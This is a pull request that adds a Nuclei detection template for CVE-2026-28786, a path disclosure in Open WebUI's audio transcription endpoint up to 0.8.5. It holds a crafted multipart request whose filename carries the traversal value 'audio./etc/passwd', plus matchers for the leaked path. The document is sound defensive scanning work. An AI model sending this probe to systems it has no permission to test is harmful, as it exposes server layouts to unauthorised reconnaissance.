### PR TITLE
Add CVE-2026-28786 Open WebUI path disclosure template

### DIFF
--- a/http/cves/2026/CVE-2026-28786.yaml
+++ b/http/cves/2026/CVE-2026-28786.yaml
@@ -1,0 +1,64 @@
+id: CVE-2026-28786
+
+info:
+  name: Open WebUI <=0.8.5 - Audio Transcription Path Disclosure
+  author: str4k3r
+  severity: medium
+  description: |
+    Open WebUI versions through 0.8.5 derive a filesystem extension from the
+    raw multipart filename in the audio transcription endpoint. An
+    authenticated low-privilege user can disclose the server's data directory
+    when the resulting path is echoed in the FileNotFoundError response.
+    Supply a valid low-privilege bearer token with -var token=...; no token is
+    embedded in this template.
+  impact: |
+    A remote authenticated user can disclose the server's absolute data path,
+    exposing deployment layout and filesystem information.
+  remediation: |
+    Upgrade Open WebUI to 0.8.6 or later.
+  reference:
+    - https://github.com/open-webui/open-webui/security/advisories/GHSA-vvxm-vxmr-624h
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-28786
+  classification:
+    cve-id: CVE-2026-28786
+    cwe-id: CWE-22
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: open-webui
+    product: open-webui
+  tags: cve,cve2026,open-webui,path-traversal,info-disclosure,auth
+
+variables:
+  token: ""
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/v1/audio/transcriptions"
+    headers:
+      Authorization: "Bearer {{token}}"
+      Content-Type: multipart/form-data; boundary=CVE28786
+    body: |
+      --CVE28786
+      Content-Disposition: form-data; name="file"; filename="audio./etc/passwd"
+      Content-Type: audio/wav
+
+
+      --CVE28786--
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 400
+      - type: word
+        part: body
+        condition: and
+        words:
+          - "No such file or directory"
+      - type: regex
+        part: body
+        regex:
+          - 'audio/transcriptions/[0-9a-f-]+\\./etc/passwd'


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-28786, the authenticated low-privilege path disclosure in Open WebUI through 0.8.5.

## Detection

The template requires a caller-supplied low-privilege bearer token and sends one malformed, empty audio upload with the documented `audio./etc/passwd` filename. The matcher requires the missing-file error and the vulnerable `audio/transcriptions/<uuid>./etc/passwd` path shape, without assuming the deployment-specific absolute data directory.

The request does not read a file, create a directory, invoke transcription, contact an external service, or embed credentials.

## Validation

- Official `ghcr.io/open-webui/open-webui:0.8.5`: DETECTED 3/3
- Official `ghcr.io/open-webui/open-webui:0.8.6`: NOT_DETECTED 3/3
- Native Nuclei v3.11.0 validation: passed

## References

- https://github.com/open-webui/open-webui/security/advisories/GHSA-vvxm-vxmr-624h
- https://nvd.nist.gov/vuln/detail/CVE-2026-28786